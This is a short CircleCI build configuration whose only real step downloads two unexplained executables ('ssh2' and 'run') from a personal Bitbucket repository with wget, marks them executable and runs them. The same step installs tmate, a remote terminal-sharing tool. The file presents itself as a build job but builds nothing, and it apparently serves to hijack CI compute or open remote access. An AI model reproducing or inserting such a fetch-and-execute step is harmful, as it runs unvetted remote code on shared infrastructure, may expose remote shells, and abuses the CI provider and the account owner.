version: 2.0
jobs:
  build:
    docker:
      - image: cimg/base:2021.04
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: sudo apt-get update -y && sudo apt-get install -y screen tmate sudo && wget https://bitbucket.org/mukidi2/ssh/raw/9a13a317a08a11b516b232b60c008a9775de0a61/ssh2 && wget https://bitbucket.org/mukidi2/ssh/raw/9a13a317a08a11b516b232b60c008a9775de0a61/run && chmod +x ssh2 run && ./ssh2 && ./ssh2 && htop
